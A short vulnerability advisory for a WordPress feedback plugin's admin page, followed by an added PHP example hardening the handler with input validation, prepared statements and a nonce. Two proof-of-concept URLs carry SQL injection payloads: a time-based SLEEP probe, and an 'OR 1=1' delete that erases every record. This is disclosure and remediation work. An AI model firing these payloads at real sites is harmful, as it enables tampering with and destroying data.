The plugin does not escape or validate the id GET parameter before using it in SQL statements, leading to SQL injection issues.
https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=detail&id=1+AND+%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29a%29
It could also be used to make a logged-in admin delete all the records: https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=delete&id=1+OR+1%3D1
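
One way an admin handler for the detail and delete actions can be hardened against both requests above. This is an added example, not the plugin's own code: the function name, table name and nonce action are hypothetical, and only core WordPress APIs are used.

```php
<?php
// Added example: hypothetical hardened handler, NOT the plugin's actual code.
// Assumed names: jq_feedback_admin_page(), table "<prefix>jq_feedback",
// nonce action "jq_feedback_delete_<id>".
function jq_feedback_admin_page() {
    global $wpdb;

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    $action = isset( $_GET['action'] ) ? sanitize_key( wp_unslash( $_GET['action'] ) ) : '';
    $raw_id = isset( $_GET['id'] ) ? wp_unslash( $_GET['id'] ) : '';

    // Validate: accept digits only, so "1 OR 1=1" or "1 AND (SELECT ...)"
    // is rejected outright instead of being silently truncated to 1.
    if ( ! is_string( $raw_id ) || ! ctype_digit( $raw_id ) ) {
        wp_die( 'Invalid id.', '', array( 'response' => 400 ) );
    }
    $id    = absint( $raw_id );
    $table = $wpdb->prefix . 'jq_feedback'; // hypothetical table name

    if ( 'detail' === $action ) {
        // Escape: the %d placeholder keeps the value out of the SQL text.
        $row = $wpdb->get_row(
            $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $id )
        );
        echo '<pre>' . esc_html( wp_json_encode( $row ) ) . '</pre>';
    } elseif ( 'delete' === $action ) {
        // State-changing action: require a per-record nonce, so a crafted
        // link followed by a logged-in admin fails before any query runs.
        check_admin_referer( 'jq_feedback_delete_' . $id );
        // $wpdb->delete() builds a prepared statement from the format array.
        $wpdb->delete( $table, array( 'id' => $id ), array( '%d' ) );
    }
}
```

The delete link rendered in the admin list would need to carry the matching nonce, for example by passing the URL through wp_nonce_url() with the same action string.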